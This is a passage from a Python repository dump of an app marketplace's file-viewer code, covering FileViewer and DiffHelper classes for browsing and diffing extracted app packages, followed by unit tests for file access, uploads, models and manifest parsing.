                self.selected.get('filename') == 'manifest.webapp'):
                file_data = self._process_manifest(file_data)
            return file_data
        except (IOError, OSError):
            self.selected['msg'] = _('That file no longer exists.')
            return ''

    def _read_file(self, allow_empty=False):
        """Read the selected file, enforcing the viewer size limit and
        decoding as UTF-16 when a BOM is present, else UTF-8."""
        if not self.selected and allow_empty:
            return ''
        assert self.selected, 'Please select a file'
        if self.selected['size'] > settings.FILE_VIEWER_SIZE_LIMIT:
            # L10n: {0} is the file size limit of the file viewer.
            msg = _(u'File size is over the limit of {0}.').format(
                filesizeformat(settings.FILE_VIEWER_SIZE_LIMIT))
            self.selected['msg'] = msg
            return ''

        with storage.open(self.selected['full'], 'r') as opened:
            cont = opened.read()
            codec = 'utf-16' if cont.startswith(codecs.BOM_UTF16) else 'utf-8'
            try:
                return cont.decode(codec)
            except UnicodeDecodeError:
                # Fall back to a lossy decode and flag the problem.
                cont = cont.decode(codec, 'ignore')
                # L10n: {0} is the codec the file failed to decode with.
                self.selected['msg'] = (
                    _('Problems decoding {0}.').format(codec))
                return cont

    def _process_manifest(self, data):
        """
        This will format the manifest nicely for maximum diff-ability.
        """
        try:
            json_data = json.loads(data)
        except Exception:
            # If there are any JSON decode problems, just return the raw file.
            return data

        def format_dict(data):
            def do_format(value):
                if isinstance(value, dict):
                    return format_dict(value)
                else:
                    return value

            # We want everything sorted, but we always want these few nodes
            # right at the top.
            prefix_nodes = ['name', 'description', 'version']
            prefix_nodes = [(k, data.pop(k)) for k in prefix_nodes if
                            k in data]
            processed_nodes = [(k, do_format(v)) for k, v in data.items()]
            return SortedDict(prefix_nodes + sorted(processed_nodes))

        return json.dumps(format_dict(json_data), indent=2)

    def select(self, file_):
        """Make `file_` (a key of get_files()) the selected entry."""
        self.selected = self.get_files().get(file_)

    def is_binary(self):
        """Truthy when the selection is binary ('image' means binary but
        displayable); sets a user-facing message for non-image binaries."""
        if self.selected:
            binary = self.selected['binary']
            if binary and binary != 'image':
                self.selected['msg'] = _('This file is not viewable online. '
                                         'Please download the file to view '
                                         'the contents.')
            return binary

    def is_directory(self):
        """Truthy when the selection is a directory; sets a message."""
        if self.selected:
            if self.selected['directory']:
                self.selected['msg'] = _('This file is a directory.')
            return self.selected['directory']

    def get_default(self, key=None):
        """Return `key` if given, otherwise the app manifest filename."""
        if key:
            return key
        return 'manifest.webapp'

    def get_files(self):
        """
        Returns a SortedDict, ordered by the filename of all the files in the
        addon-file. Full of all the useful information you'll need to serve
        this file, build templates etc.
        """
        if self._files:
            return self._files
        if not self.is_extracted():
            return {}
        # In case a cron job comes along and deletes the files
        # mid tree building.
        try:
            self._files = self._get_files()
            return self._files
        except (OSError, IOError):
            return {}

    def truncate(self, filename, pre_length=15, post_length=10,
                 ellipsis=u'..'):
        """
        Truncates a filename so that
            somelongfilename.htm
        becomes:
            some...htm
        as it truncates around the extension.
        """
        root, ext = os.path.splitext(filename)
        if len(root) > pre_length:
            root = root[:pre_length] + ellipsis
        if len(ext) > post_length:
            ext = ext[:post_length] + ellipsis
        return root + ext

    def get_syntax(self, filename):
        """
        Converts a filename into a syntax for the syntax highlighter, with
        some modifications for specific common mozilla files.
        The list of syntaxes is from:
        http://alexgorbatchev.com/SyntaxHighlighter/manual/brushes/
        """
        if filename:
            short = os.path.splitext(filename)[1][1:]
            # Map Mozilla-specific extensions onto real highlighter brushes.
            syntax_map = {'xul': 'xml', 'rdf': 'xml', 'jsm': 'js',
                          'json': 'js', 'webapp': 'js'}
            short = syntax_map.get(short, short)
            if short in ['actionscript3', 'as3', 'bash', 'shell', 'cpp', 'c',
                         'c#', 'c-sharp', 'csharp', 'css', 'diff', 'html',
                         'java', 'javascript', 'js', 'jscript', 'patch',
                         'pas', 'php', 'plain', 'py', 'python', 'sass',
                         'scss', 'text', 'sql', 'vb', 'vbnet', 'xml', 'xhtml',
                         'xslt']:
                return short
        return 'plain'

    @memoize(prefix='file-viewer', time=60 * 60)
    def _get_files(self):
        """Walk the extracted tree and build the per-file metadata dict.

        Cached for an hour per FileViewer arguments via `memoize`.
        """
        all_files, res = [], SortedDict()

        # Not using os.path.walk so we get just the right order:
        # each directory immediately followed by its contents.
        def iterate(path):
            path_dirs, path_files = storage.listdir(path)
            for dirname in sorted(path_dirs):
                full = os.path.join(path, dirname)
                all_files.append(full)
                iterate(full)

            for filename in sorted(path_files):
                full = os.path.join(path, filename)
                all_files.append(full)

        iterate(self.dest)

        for path in all_files:
            filename = smart_unicode(os.path.basename(path), errors='replace')
            # 'short' is the path relative to the extraction root.
            short = smart_unicode(path[len(self.dest) + 1:], errors='replace')
            mime, encoding = mimetypes.guess_type(filename)
            if not mime and filename == 'manifest.webapp':
                mime = 'application/x-web-app-manifest+json'
            directory = os.path.isdir(path)

            res[short] = {
                'binary': self._is_binary(mime, path),
                'depth': short.count(os.sep),
                'directory': directory,
                'filename': filename,
                'full': path,
                'md5': get_md5(path) if not directory else '',
                'mimetype': mime or 'application/octet-stream',
                'syntax': self.get_syntax(filename),
                'modified': os.stat(path)[stat.ST_MTIME],
                'short': short,
                'size': os.stat(path)[stat.ST_SIZE],
                'truncated': self.truncate(filename),
                'url': reverse('mkt.files.list',
                               args=[self.file.id, 'file', short]),
                'url_serve': reverse('mkt.files.redirect',
                                     args=[self.file.id, short]),
                'version': self.file.version.version,
            }

        return res
class DiffHelper(object):
    """Pair two FileViewers so two versions of a file can be compared.

    `left` is the primary version under review; `right` is the version it
    is being diffed against.
    """

    def __init__(self, left, right):
        self.left = FileViewer(left)
        self.right = FileViewer(right)
        self.addon = self.left.addon
        self.key = None

    def __str__(self):
        return '%s:%s' % (self.left, self.right)

    def extract(self):
        self.left.extract(), self.right.extract()

    def cleanup(self):
        self.left.cleanup(), self.right.cleanup()

    def is_extracted(self):
        return self.left.is_extracted() and self.right.is_extracted()

    def get_url(self, short):
        # URL for the side-by-side comparison of one file in both versions.
        url_name = 'mkt.files.compare'
        return reverse(url_name,
                       args=[self.left.file.id, self.right.file.id,
                             'file', short])

    #@memoize(prefix='file-viewer-get-files', time=60 * 60)
    def get_files(self):
        """
        Get the files from the primary and:
        - remap any diffable ones to the compare url as opposed to the other
        - highlight any diffs
        """
        left_files = self.left.get_files()
        right_files = self.right.get_files()
        different = []
        for key, file in left_files.items():
            file['url'] = self.get_url(file['short'])
            # A file differs when its md5 doesn't match the other side's
            # (including when it doesn't exist there at all).
            diff = file['md5'] != right_files.get(key, {}).get('md5')
            file['diff'] = diff
            if diff:
                different.append(file)

        # Now mark every directory above each different file as different.
        for diff in different:
            for depth in range(diff['depth']):
                key = '/'.join(diff['short'].split('/')[:depth + 1])
                if key in left_files:
                    left_files[key]['diff'] = True

        return left_files

    #@memoize(prefix='file-viewer-get-deleted-files', time=60 * 60)
    def get_deleted_files(self):
        """
        Get files that exist in right, but not in left. These
        are files that have been deleted between the two versions.
        Every element will be marked as a diff.
        """
        different = SortedDict()
        left_files = self.left.get_files()
        right_files = self.right.get_files()
        for key, file in right_files.items():
            if key not in left_files:
                # NOTE(review): `copy` is the same dict object cached by the
                # right FileViewer, so update() mutates that cache in place —
                # presumably intentional, but worth confirming.
                copy = right_files[key]
                copy.update({'url': self.get_url(file['short']), 'diff': True})
                different[key] = copy

        return different

    def read_file(self):
        """Reads both selected files."""
        return [self.left.read_file(allow_empty=True),
                self.right.read_file(allow_empty=True)]

    def select(self, key):
        """Select `key` in both viewers; truthy only if both sides have it."""
        self.key = key
        self.left.select(key)
        self.right.select(key)
        return self.left.selected and self.right.selected

    def is_binary(self):
        """Truthy if either selected file is binary."""
        return self.left.is_binary() or self.right.is_binary()

    def is_diffable(self):
        """Tells you if the selected files are diffable."""
        if not self.left.selected and not self.right.selected:
            return False

        for obj in [self.left, self.right]:
            if obj.is_binary():
                return False
            if obj.is_directory():
                return False
        return True
def copyfileobj(fsrc, fdst, length=64 * 1024):
    """Copy data from file-like object *fsrc* to *fdst* in fixed-size chunks.

    Works for both text and binary streams; stops at end-of-file.
    """
    while True:
        chunk = fsrc.read(length)
        if not chunk:
            return
        fdst.write(chunk)
def rmtree(prefix):
    """Recursively delete *prefix* and everything below it via the
    storage API (files first, then subtrees, then the prefix itself)."""
    subdirs, filenames = storage.listdir(prefix)
    for name in filenames:
        storage.delete(os.path.join(prefix, name))
    for subdir in subdirs:
        rmtree(os.path.join(prefix, subdir))
    storage.delete(prefix)
########NEW FILE########
__FILENAME__ = test_decorators
from django import http
from django.core.exceptions import ObjectDoesNotExist, PermissionDenied
from mock import Mock, patch
import amo.tests
from access import acl
from files.decorators import allowed
class AllowedTest(amo.tests.TestCase):
    """Access control for the file-viewer `allowed` decorator helper."""

    def setUp(self):
        self.request = Mock()
        self.file = Mock()

    @patch.object(acl, 'check_reviewer', lambda x: True)
    def test_reviewer_allowed(self):
        """Reviewers may view the file."""
        self.assertTrue(allowed(self.request, self.file))

    @patch.object(acl, 'check_reviewer', lambda x: False)
    def test_reviewer_unallowed(self):
        """Non-reviewers get PermissionDenied."""
        with self.assertRaises(PermissionDenied):
            allowed(self.request, self.file)

    @patch.object(acl, 'check_reviewer', lambda x: False)
    def test_addon_not_found(self):
        """A missing add-on surfaces as a 404 rather than a crash."""
        class BrokenVersion:
            @property
            def addon(self):
                raise ObjectDoesNotExist

        self.file.version = BrokenVersion()
        with self.assertRaises(http.Http404):
            allowed(self.request, self.file)
########NEW FILE########
__FILENAME__ = test_helpers
# -*- coding: utf-8 -*-
import os
import zipfile
from django import forms
from django.conf import settings
from django.core.cache import cache
from django.core.urlresolvers import reverse
from mock import Mock, patch
from nose.tools import eq_
import amo.tests
from files.utils import SafeUnzip
from mkt.files.helpers import FileViewer, DiffHelper
# Directory holding the binary add-on fixtures used by these tests.
root = os.path.join(settings.ROOT, 'apps/files/fixtures/files')


def get_file(x):
    """Return the path of fixture *x* under `root`.

    Was a lambda assignment; PEP 8 (E731) prefers a named def, which also
    gives the callable a useful __name__ in tracebacks.
    """
    return '%s/%s' % (root, x)
def make_file(pk, file_path, **kwargs):
    """Build a Mock standing in for a File model instance.

    *pk* becomes the id, *file_path* the on-disk path; any extra keyword
    arguments are set as attributes on the mock. The mock carries a
    version whose `version` is 1.
    """
    mock_file = Mock()
    mock_file.id = pk
    for attr, value in kwargs.items():
        setattr(mock_file, attr, value)
    mock_file.file_path = file_path
    mock_file.__str__ = lambda self: self.pk
    mock_file.version = Mock()
    mock_file.version.version = 1
    return mock_file
# TODO: It'd be nice if these used packaged app examples but these addons still
# flex the code so it wasn't converted.
class TestFileHelper(amo.tests.TestCase):
    """Exercises FileViewer extraction, listing and reading behaviour
    against the dictionary-test.xpi fixture."""

    def setUp(self):
        self.viewer = FileViewer(make_file(1, get_file('dictionary-test.xpi')))

    def tearDown(self):
        self.viewer.cleanup()

    def test_files_not_extracted(self):
        eq_(self.viewer.is_extracted(), False)

    def test_files_extracted(self):
        self.viewer.extract()
        eq_(self.viewer.is_extracted(), True)

    def test_recurse_extract(self):
        self.viewer.src = get_file('recurse.xpi')
        self.viewer.extract()
        eq_(self.viewer.is_extracted(), True)

    def test_recurse_contents(self):
        # Nested archives should be expanded in place during extraction.
        self.viewer.src = get_file('recurse.xpi')
        self.viewer.extract()
        files = self.viewer.get_files()
        nm = ['recurse/recurse.xpi/chrome/test-root.txt',
              'recurse/somejar.jar/recurse/recurse.xpi/chrome/test.jar',
              'recurse/somejar.jar/recurse/recurse.xpi/chrome/test.jar/test']
        for name in nm:
            eq_(name in files, True, 'File %r not extracted' % name)

    def test_cleanup(self):
        self.viewer.extract()
        self.viewer.cleanup()
        eq_(self.viewer.is_extracted(), False)

    def test_truncate(self):
        truncate = self.viewer.truncate
        for x, y in (['foo.rdf', 'foo.rdf'],
                     ['somelongfilename.rdf', 'somelongfilenam...rdf'],
                     [u'unicode삮.txt', u'unicode\uc0ae.txt'],
                     [u'unicodesomelong삮.txt', u'unicodesomelong...txt'],
                     ['somelongfilename.somelongextension',
                      'somelongfilenam...somelonge..'],):
            eq_(truncate(x), y)

    def test_get_files_not_extracted(self):
        assert not self.viewer.get_files()

    def test_get_files_size(self):
        self.viewer.extract()
        files = self.viewer.get_files()
        eq_(len(files), 14)

    def test_get_files_directory(self):
        self.viewer.extract()
        files = self.viewer.get_files()
        eq_(files['install.js']['directory'], False)
        eq_(files['install.js']['binary'], False)
        eq_(files['__MACOSX']['directory'], True)
        eq_(files['__MACOSX']['binary'], False)

    def test_url_file(self):
        self.viewer.extract()
        files = self.viewer.get_files()
        url = reverse('mkt.files.list', args=[self.viewer.file.id, 'file',
                                              'install.js'])
        assert files['install.js']['url'].endswith(url)

    def test_get_files_depth(self):
        self.viewer.extract()
        files = self.viewer.get_files()
        eq_(files['dictionaries/license.txt']['depth'], 1)

    def test_bom(self):
        # A UTF-16 BOM should be detected and the file decoded accordingly.
        dest = os.path.join(settings.TMP_PATH, 'test_bom')
        open(dest, 'w').write('foo'.encode('utf-16'))
        self.viewer.select('foo')
        self.viewer.selected = {'full': dest, 'size': 1}
        eq_(self.viewer.read_file(), u'foo')
        os.remove(dest)

    def test_syntax(self):
        for filename, syntax in [('foo.rdf', 'xml'),
                                 ('foo.xul', 'xml'),
                                 ('foo.json', 'js'),
                                 ('foo.jsm', 'js'),
                                 ('foo.js', 'js'),
                                 ('manifest.webapp', 'js'),
                                 ('foo.html', 'html'),
                                 ('foo.css', 'css'),
                                 ('foo.bar', 'plain')]:
            eq_(self.viewer.get_syntax(filename), syntax)

    def test_file_order(self):
        self.viewer.extract()
        dest = self.viewer.dest
        open(os.path.join(dest, 'chrome.manifest'), 'w')
        subdir = os.path.join(dest, 'chrome')
        os.mkdir(subdir)
        open(os.path.join(subdir, 'foo'), 'w')
        # The file listing is memoized; drop the cache before re-listing.
        cache.clear()
        files = self.viewer.get_files().keys()
        rt = files.index(u'chrome')
        # A directory must be immediately followed by its contents.
        eq_(files[rt:rt + 3], [u'chrome', u'chrome/foo', u'dictionaries'])

    @patch.object(settings, 'FILE_VIEWER_SIZE_LIMIT', 5)
    def test_file_size(self):
        self.viewer.extract()
        self.viewer.get_files()
        self.viewer.select('install.js')
        res = self.viewer.read_file()
        eq_(res, '')
        assert self.viewer.selected['msg'].startswith('File size is')

    @patch.object(settings, 'FILE_VIEWER_SIZE_LIMIT', 5)
    def test_file_size_unicode(self):
        # The size message must also build cleanly in a non-English locale.
        with self.activate(locale='he'):
            self.viewer.extract()
            self.viewer.get_files()
            self.viewer.select('install.js')
            res = self.viewer.read_file()
            eq_(res, '')
            assert self.viewer.selected['msg'].startswith('File size is')

    @patch.object(settings, 'FILE_UNZIP_SIZE_LIMIT', 5)
    def test_contents_size(self):
        self.assertRaises(forms.ValidationError, self.viewer.extract)

    def test_default(self):
        eq_(self.viewer.get_default(None), 'manifest.webapp')

    def test_delete_mid_read(self):
        self.viewer.extract()
        self.viewer.select('install.js')
        os.remove(os.path.join(self.viewer.dest, 'install.js'))
        res = self.viewer.read_file()
        eq_(res, '')
        assert self.viewer.selected['msg'].startswith('That file no')

    @patch('mkt.files.helpers.get_md5')
    def test_delete_mid_tree(self, get_md5):
        # get_files() swallows IOError/OSError raised while walking the tree.
        get_md5.side_effect = IOError('ow')
        self.viewer.extract()
        eq_({}, self.viewer.get_files())
class TestDiffHelper(amo.tests.TestCase):
    """Exercises DiffHelper against two copies of the same add-on."""

    def setUp(self):
        src = os.path.join(settings.ROOT, get_file('dictionary-test.xpi'))
        self.helper = DiffHelper(make_file(1, src), make_file(2, src))

    def tearDown(self):
        self.helper.cleanup()

    def test_files_not_extracted(self):
        eq_(self.helper.is_extracted(), False)

    def test_files_extracted(self):
        self.helper.extract()
        eq_(self.helper.is_extracted(), True)

    def test_get_files(self):
        eq_(self.helper.left.get_files(),
            self.helper.get_files())

    def test_diffable(self):
        self.helper.extract()
        self.helper.select('install.js')
        assert self.helper.is_diffable()

    def test_diffable_one_missing(self):
        self.helper.extract()
        os.remove(os.path.join(self.helper.right.dest, 'install.js'))
        self.helper.select('install.js')
        assert self.helper.is_diffable()

    def test_diffable_allow_empty(self):
        # read_file asserts without allow_empty when nothing is selected.
        self.helper.extract()
        self.assertRaises(AssertionError, self.helper.right.read_file)
        eq_(self.helper.right.read_file(allow_empty=True), '')

    def test_diffable_both_missing(self):
        self.helper.extract()
        self.helper.select('foo.js')
        assert not self.helper.is_diffable()

    def test_diffable_deleted_files(self):
        self.helper.extract()
        os.remove(os.path.join(self.helper.left.dest, 'install.js'))
        eq_('install.js' in self.helper.get_deleted_files(), True)

    def test_diffable_one_binary_same(self):
        self.helper.extract()
        self.helper.select('install.js')
        self.helper.left.selected['binary'] = True
        assert self.helper.is_binary()

    def test_diffable_one_binary_diff(self):
        self.helper.extract()
        self.change(self.helper.left.dest, 'asd')
        cache.clear()
        self.helper.select('install.js')
        self.helper.left.selected['binary'] = True
        assert self.helper.is_binary()

    def test_diffable_two_binary_diff(self):
        self.helper.extract()
        self.change(self.helper.left.dest, 'asd')
        self.change(self.helper.right.dest, 'asd123')
        cache.clear()
        self.helper.select('install.js')
        self.helper.left.selected['binary'] = True
        self.helper.right.selected['binary'] = True
        assert self.helper.is_binary()

    def test_diffable_one_directory(self):
        self.helper.extract()
        self.helper.select('install.js')
        self.helper.left.selected['directory'] = True
        assert not self.helper.is_diffable()
        assert self.helper.left.selected['msg'].startswith('This file')

    def test_diffable_parent(self):
        # A change in a nested file should flag its parent directory too.
        self.helper.extract()
        self.change(self.helper.left.dest, 'asd',
                    filename='__MACOSX/._dictionaries')
        cache.clear()
        files = self.helper.get_files()
        eq_(files['__MACOSX/._dictionaries']['diff'], True)
        eq_(files['__MACOSX']['diff'], True)

    def change(self, file, text, filename='install.js'):
        # Append `text` to `filename` under directory `file`.
        path = os.path.join(file, filename)
        data = open(path, 'r').read()
        data += text
        open(path, 'w').write(data)
class TestSafeUnzipFile(amo.tests.TestCase, amo.tests.AMOPaths):
    """Spot-checks for SafeUnzip validation, extraction and signing."""
    #TODO(andym): get full coverage for existing SafeUnzip methods, most
    # is covered in the file viewer tests.

    @patch.object(settings, 'FILE_UNZIP_SIZE_LIMIT', 5)
    def test_unzip_limit(self):
        zip = SafeUnzip(self.xpi_path('langpack-localepicker'))
        self.assertRaises(forms.ValidationError, zip.is_valid)

    def test_unzip_fatal(self):
        # A non-zip raises by default...
        zip = SafeUnzip(self.xpi_path('search.xml'))
        self.assertRaises(zipfile.BadZipfile, zip.is_valid)

    def test_unzip_not_fatal(self):
        # ...but only returns False when fatal=False.
        zip = SafeUnzip(self.xpi_path('search.xml'))
        assert not zip.is_valid(fatal=False)

    def test_extract_path(self):
        zip = SafeUnzip(self.xpi_path('langpack-localepicker'))
        assert zip.is_valid()
        assert 'locale browser de' in zip.extract_path('chrome.manifest')

    def test_not_secure(self):
        zip = SafeUnzip(self.xpi_path('extension'))
        zip.is_valid()
        assert not zip.is_signed()

    def test_is_secure(self):
        zip = SafeUnzip(self.xpi_path('signed'))
        zip.is_valid()
        assert zip.is_signed()

    def test_is_broken(self):
        # Renaming the .sf signature entry should break signature detection.
        zip = SafeUnzip(self.xpi_path('signed'))
        zip.is_valid()
        zip.info[2].filename = 'META-INF/foo.sf'
        assert not zip.is_signed()
########NEW FILE########
__FILENAME__ = test_models
# -*- coding: utf-8 -*-
import hashlib
import json
import os
from django.conf import settings
from django.core.files.storage import default_storage as storage
import amo
import amo.tests
import mock
import path
from nose.tools import eq_
from addons.models import Addon
from files.models import File, FileUpload, FileValidation, nfd_str, Platform
from versions.models import Version
from mkt.files.helpers import copyfileobj
from mkt.site.fixtures import fixture
class UploadTest(amo.tests.TestCase, amo.tests.AMOPaths):
    """
    Base for tests that mess with file uploads, safely using temp directories.
    """
    fixtures = ['applications/all_apps.json', 'base/appversion']

    def setUp(self):
        # Patch path.rename to copy so fixture files are never moved away.
        self._rename = path.path.rename
        path.path.rename = path.path.copy

    def tearDown(self):
        path.path.rename = self._rename

    def file_path(self, *args, **kw):
        return self.file_fixture_path(*args, **kw)

    def get_upload(self, filename=None, abspath=None, validation=None,
                   is_webapp=False):
        """Build and save a FileUpload from a fixture file (or abspath)."""
        zip = open(abspath if abspath else self.file_path(filename)).read()
        upload = FileUpload.from_post([zip], filename=abspath or filename,
                                      size=1234)
        # Simulate what fetch_manifest() does after uploading an app.
        upload.is_webapp = is_webapp
        upload.validation = (validation or
                             json.dumps(dict(errors=0, warnings=1, notices=2,
                                             metadata={}, messages=[])))
        upload.save()
        return upload
class TestFileUpload(UploadTest):
    """Behaviour of FileUpload.from_post and validation bookkeeping."""
    fixtures = fixture('webapp_337141')

    def setUp(self):
        super(TestFileUpload, self).setUp()
        self.data = 'file contents'

    def upload(self):
        # The data should be in chunks.
        data = [''.join(x) for x in amo.utils.chunked(self.data, 3)]
        return FileUpload.from_post(data, 'filename.zip', len(self.data))

    def test_from_post_write_file(self):
        eq_(storage.open(self.upload().path).read(), self.data)

    def test_from_post_filename(self):
        eq_(self.upload().name, 'filename.zip')

    def test_from_post_hash(self):
        hash = hashlib.sha256(self.data).hexdigest()
        eq_(self.upload().hash, 'sha256:%s' % hash)

    def test_save_without_validation(self):
        f = FileUpload.objects.create()
        assert not f.valid

    def test_save_with_validation(self):
        f = FileUpload.objects.create(
            validation='{"errors": 0, "metadata": {}}')
        assert f.valid
        # Unparseable validation JSON must not mark the upload valid.
        f = FileUpload.objects.create(validation='wtf')
        assert not f.valid

    def test_update_with_validation(self):
        f = FileUpload.objects.create()
        f.validation = '{"errors": 0, "metadata": {}}'
        f.save()
        assert f.valid

    def test_update_without_validation(self):
        f = FileUpload.objects.create()
        f.save()
        assert not f.valid

    def test_ascii_names(self):
        # Non-ASCII filenames should still yield a usable name that keeps
        # the extension.
        fu = FileUpload.from_post('', u'mözball.zip', 0)
        assert 'zip' in fu.name
        fu = FileUpload.from_post('', u'мозила_србија-0.11.zip', 0)
        assert 'zip' in fu.name
        fu = FileUpload.from_post('', u'フォクすけといっしょ.zip', 0)
        assert 'zip' in fu.name
        fu = FileUpload.from_post('', u'\u05d0\u05d5\u05e1\u05e3.zip', 0)
        assert 'zip' in fu.name
class TestFileFromUpload(UploadTest):
    """Behaviour of File.from_upload for hosted and packaged apps."""
    fixtures = ['base/apps']

    def setUp(self):
        super(TestFileFromUpload, self).setUp()
        self.platform = Platform.objects.get(id=amo.PLATFORM_ALL.id)
        self.addon = Addon.objects.create(type=amo.ADDON_WEBAPP,
                                          name='app name')
        self.version = Version.objects.create(addon=self.addon)

    def upload(self, name):
        """Create a FileUpload pointing at the packaged-app fixture `name`."""
        if os.path.splitext(name)[-1] not in ['.webapp', '.zip']:
            name = name + '.zip'
        v = json.dumps(dict(errors=0, warnings=1, notices=2, metadata={}))
        fname = nfd_str(self.packaged_app_path(name))
        if not storage.exists(fname):
            with storage.open(fname, 'w') as fs:
                copyfileobj(open(fname), fs)
        d = dict(path=fname, name=name,
                 hash='sha256:%s' % name, validation=v)
        return FileUpload.objects.create(**d)

    def test_filename_hosted(self):
        # Hosted apps get a .webapp manifest filename.
        upload = self.upload('mozball')
        f = File.from_upload(upload, self.version, self.platform)
        eq_(f.filename, 'app-name-0.1.webapp')

    def test_filename_packaged(self):
        # Packaged apps get a .zip filename.
        self.addon.is_packaged = True
        upload = self.upload('mozball')
        f = File.from_upload(upload, self.version, self.platform)
        eq_(f.filename, 'app-name-0.1.zip')

    def test_file_validation(self):
        upload = self.upload('mozball')
        file = File.from_upload(upload, self.version, self.platform)
        fv = FileValidation.objects.get(file=file)
        eq_(fv.validation, upload.validation)
        eq_(fv.valid, True)
        eq_(fv.errors, 0)
        eq_(fv.warnings, 1)
        eq_(fv.notices, 2)

    def test_file_hash(self):
        upload = self.upload('mozball')
        f = File.from_upload(upload, self.version, self.platform)
        assert f.hash.startswith('sha256:')
        assert len(f.hash) == 64 + 7  # 64 for hash, 7 for 'sha256:'

    def test_utf8(self):
        # Non-ASCII add-on names must still produce an ASCII slug filename.
        upload = self.upload(u'mozball')
        self.version.addon.name = u'mözball'
        f = File.from_upload(upload, self.version, self.platform)
        eq_(f.filename, u'app-name-0.1.webapp')

    def test_size(self):
        upload = self.upload('mozball')
        f = File.from_upload(upload, self.version, self.platform)
        eq_(f.size, 93594)

    def test_file_hash_paranoia(self):
        # The hash must be recomputed from the file, not trusted from upload.
        upload = self.upload('mozball')
        f = File.from_upload(upload, self.version, self.platform)
        assert f.hash.startswith('sha256:ad85d6316166d46')
class TestFile(amo.tests.TestCase, amo.tests.AMOPaths):
    """
    Tests the methods of the File model.
    """
    fixtures = fixture('webapp_337141')

    def test_get_absolute_url(self):
        f = File.objects.get()
        url = f.get_absolute_url(src='src')
        expected = '/downloads/file/81555/steamcube.webapp?src=src'
        assert url.endswith(expected), url

    def check_delete(self, file_, filename):
        """Test that when the File object is deleted, it is removed from the
        filesystem."""
        try:
            with storage.open(filename, 'w') as f:
                f.write('sample data\n')
            assert storage.exists(filename)
            file_.delete()
            assert not storage.exists(filename)
        finally:
            # Clean up even if the delete above did not remove the file.
            if storage.exists(filename):
                storage.delete(filename)

    def test_delete_by_version(self):
        # Deleting the Version cascades to the file on disk.
        f = File.objects.get()
        version = f.version
        self.check_delete(version, f.file_path)

    def test_delete_file_path(self):
        f = File.objects.get()
        self.check_delete(f, f.file_path)

    def test_delete_no_file(self):
        """Test that the file object can be deleted without the file being
        present."""
        f = File.objects.get()
        filename = f.file_path
        assert not os.path.exists(filename), 'File exists at: %s' % filename
        f.delete()

    def test_delete_signal(self):
        """Test that if there's no filename, the signal is ok."""
        f = File.objects.get()
        f.update(filename='')
        f.delete()

    @mock.patch('files.models.File.hide_disabled_file')
    def test_disable_signal(self, hide_mock):
        # hide_disabled_file only runs on a transition to STATUS_DISABLED.
        f = File.objects.get()
        f.status = amo.STATUS_PUBLIC
        f.save()
        assert not hide_mock.called

        f.status = amo.STATUS_DISABLED
        f.save()
        assert hide_mock.called

    @mock.patch('files.models.File.unhide_disabled_file')
    def test_unhide_on_enable(self, unhide_mock):
        # unhide only runs when leaving STATUS_DISABLED, not entering it.
        f = File.objects.get()
        f.status = amo.STATUS_PUBLIC
        f.save()
        assert not unhide_mock.called

        f = File.objects.get()
        f.status = amo.STATUS_DISABLED
        f.save()
        assert not unhide_mock.called

        f = File.objects.get()
        f.status = amo.STATUS_PUBLIC
        f.save()
        assert unhide_mock.called

    def test_unhide_disabled_files(self):
        # A file sitting in the guarded area is moved back to file_path.
        f = File.objects.get()
        f.status = amo.STATUS_PUBLIC
        with storage.open(f.guarded_file_path, 'wb') as fp:
            fp.write('some data\n')
        f.unhide_disabled_file()
        assert storage.exists(f.file_path)
        assert storage.open(f.file_path).size

    def test_generate_filename(self):
        f = File.objects.get()
        eq_(f.generate_filename(), 'something-something-1.0.webapp')

    def test_generate_filename_packaged_app(self):
        f = File.objects.get()
        f.version.addon.app_slug = 'testing-123'
        f.version.addon.type = amo.ADDON_WEBAPP
        f.version.addon.is_packaged = True
        eq_(f.generate_filename(), 'testing-123-1.0.zip')

    def test_generate_webapp_fn_non_ascii(self):
        # A slug with no ASCII chars falls back to the generic 'app' name.
        f = File()
        f.version = Version(version='0.1.7')
        f.version.compatible_apps = (amo.FIREFOX,)
        f.version.addon = Addon(app_slug=u' フォクすけ といっしょ',
                                type=amo.ADDON_WEBAPP)
        eq_(f.generate_filename(), 'app-0.1.7.webapp')

    def test_generate_webapp_fn_partial_non_ascii(self):
        # Only the ASCII part of the slug survives in the filename.
        f = File()
        f.version = Version(version='0.1.7')
        f.version.compatible_apps = (amo.FIREFOX,)
        f.version.addon = Addon(app_slug=u'myapp フォクすけ といっしょ',
                                type=amo.ADDON_WEBAPP)
        eq_(f.generate_filename(), 'myapp-0.1.7.webapp')

    def test_generate_filename_ja(self):
        # With no slug at all, a fully non-ASCII name becomes 'none'.
        f = File()
        f.version = Version(version='0.1.7')
        f.version.addon = Addon(name=u' フォクすけ といっしょ')
        eq_(f.generate_filename(), 'none-0.1.7.webapp')

    def clean_files(self, f):
        """Ensure a file exists on disk for *f* so path-based tests pass."""
        if not storage.exists(f.file_path):
            with storage.open(f.file_path, 'w') as fp:
                fp.write('sample data\n')

    def test_generate_hash(self):
        f = File()
        f.version = Version.objects.get()
        fn = self.packaged_app_path('mozball.zip')
        assert f.generate_hash(fn).startswith('sha256:ad85d6316166d4')

    def test_addon(self):
        # file.addon still resolves even when the addon is soft-deleted.
        f = File.objects.get()
        addon_id = f.version.addon_id
        addon = Addon.objects.no_cache().get(pk=addon_id)
        addon.update(status=amo.STATUS_DELETED)
        eq_(f.addon.id, addon_id)
class TestSignedPath(amo.tests.TestCase):
    """Checks the derived filesystem paths for signed packages."""
    fixtures = fixture('webapp_337141')

    def setUp(self):
        self.file_ = File.objects.get(pk=81555)

    def _expected(self, root):
        """Build the expected signed path rooted at *root*."""
        signed = self.file_.file_path.replace('.webapp', '.signed.webapp')
        return signed.replace(settings.ADDONS_PATH, root)

    def test_path(self):
        eq_(self.file_.signed_file_path,
            self._expected(settings.SIGNED_APPS_PATH))

    def test_reviewer_path(self):
        eq_(self.file_.signed_reviewer_file_path,
            self._expected(settings.SIGNED_APPS_REVIEWER_PATH))
########NEW FILE########
__FILENAME__ = test_utils_
import mock
from nose.tools import eq_
from django import forms
import amo.tests
from files.utils import WebAppParser
class TestWebAppParser(amo.tests.TestCase):
    """Validation and localization behavior of WebAppParser.parse().

    get_json_data() is mocked throughout, so parse('') never touches disk.
    """

    @mock.patch('files.utils.WebAppParser.get_json_data')
    def test_no_developer_name(self, get_json_data):
        # Missing 'developer' key entirely -> validation error.
        get_json_data.return_value = {
            'name': 'Blah'
        }
        with self.assertRaises(forms.ValidationError) as e:
            # The argument to parse() is supposed to be a filename, it doesn't
            # matter here though since we are mocking get_json_data().
            WebAppParser().parse('')
